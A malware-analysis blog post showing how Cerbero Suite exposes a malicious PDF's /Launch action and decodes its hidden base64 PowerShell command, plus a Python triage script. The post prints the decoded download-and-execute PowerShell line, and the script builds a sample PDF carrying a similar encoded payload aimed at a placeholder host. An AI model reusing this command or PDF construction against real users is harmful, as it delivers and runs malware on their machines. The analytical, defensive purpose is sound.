Finally, I can write in this blog space again after some time focusing on other things. Today I would like to write about reversing a malicious PDF to get detailed information on what it is trying to do to our endpoint. Many tools can help you during analysis, but today I will use one integrated file analysis tool called Cerbero Suite Advanced. I love this application because it gives the most functionality for file analysis.

Cerbero can fully parse the PDF data structure and show it in a structured way. Let's open the malware sample by right-clicking on it and analyzing it with Cerbero. We can see in the image below that Cerbero directly gives you a hint that the file has a threat inside. We can see that the PDF file has five objects, so we can start analyzing the file from object number one. Cerbero gives you information about the object in the raw data window, and we can select the object from the format window. We can understand that this object performs a /Launch /Win action when the document is opened: it is shown that the PDF will start a PowerShell command with base64 encoding.

We can also see the hierarchy of the objects in the tree tab, as shown below, which is clearer. Open a new text window for analysis. To analyze further what command will run, we can copy the item and paste it into the text analysis window. We can see that PowerShell will execute an encoded command with the window style hidden. Let's start decoding the PowerShell command from base64. It is straightforward to crack with Cerbero: select the base64 encoded text, press CTRL+R and choose Base64 to bytes, and it will show you the result in the hex string window.

Here is the full command that PowerShell triggers on start (the download URL is shown as a placeholder):

    PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('<download URL>', "$env:APPDATA\awori.exe"); Start-Process ("$env:APPDATA\awori.exe")

Now we can understand that PowerShell will download the malware from that URL into %APPDATA% and execute it in a hidden window. I would like to encourage malware analysts to use Cerbero for file analysis; it has various features that make your life easier.
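As an added example (my own code, not the author's and not part of Cerbero), the Python below does by hand what the post walks through in Cerbero: it lists the objects of a small constructed PDF, flags the one carrying a /Launch action, and base64-decodes the PowerShell payload. It assumes the encoded payload is passed with PowerShell's -EncodedCommand switch (UTF-16LE before base64), and the sample PDF, object layout and .invalid URL are constructed for the demonstration.

```python
import base64
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample (not real malware): a minimal PDF whose /OpenAction is a
# /Launch /Win action running PowerShell with a base64 (UTF-16LE) -EncodedCommand,
# the pattern the post walks through in Cerbero. The URL uses the reserved .invalid TLD.
_PS_CMD = ("(New-Object System.Net.WebClient).DownloadFile("
           "'http://example.invalid/awori', \"$env:APPDATA\\awori.exe\"); "
           "Start-Process (\"$env:APPDATA\\awori.exe\")")
_ENCODED = base64.b64encode(_PS_CMD.encode("utf-16le"))
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>\nendobj\n"
    b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n"
    b"3 0 obj\n<< /Type /Page /Parent 2 0 R >>\nendobj\n"
    b"4 0 obj\n<< /Type /Action /S /Launch /Win << /F (cmd.exe) /P (/c PowerShell "
    b"-ExecutionPolicy bypass -noprofile -windowstyle hidden -EncodedCommand "
    + _ENCODED + b") >> >>\nendobj\n"
    b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"
)

# "N G obj ... endobj" spans (enough for an uncompressed PDF without object streams)
_OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj(.*?)endobj", re.S)
# PowerShell's encoded-command switch (common abbreviations) and its base64 argument
_ENC_RE = re.compile(rb"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

def list_objects(pdf: bytes) -> Dict[int, bytes]:
    """Map object number -> raw object body, like Cerbero's object list."""
    return {int(m.group(1)): m.group(3) for m in _OBJ_RE.finditer(pdf)}

def find_launch_objects(pdf: bytes) -> List[int]:
    """Object numbers carrying a /Launch action, the post's first red flag."""
    return [n for n, body in list_objects(pdf).items() if b"/Launch" in body]

def decode_encoded_command(body: bytes) -> Optional[str]:
    """Base64-decode a PowerShell -EncodedCommand (PowerShell expects UTF-16LE)."""
    m = _ENC_RE.search(body)
    return base64.b64decode(m.group(1)).decode("utf-16le") if m else None

def triage(pdf: bytes) -> List[Tuple[int, Optional[str]]]:
    """(object number, decoded command or None) for every /Launch object."""
    objs = list_objects(pdf)
    return [(n, decode_encoded_command(objs[n])) for n in find_launch_objects(pdf)]

if __name__ == "__main__":
    for num, cmd in triage(SAMPLE_PDF):
        print(f"object {num}: /Launch -> {cmd}")
```

Real samples often hide the action inside compressed object streams, so a production triage script should decompress those first; the regexes here only cover the uncompressed case the post shows.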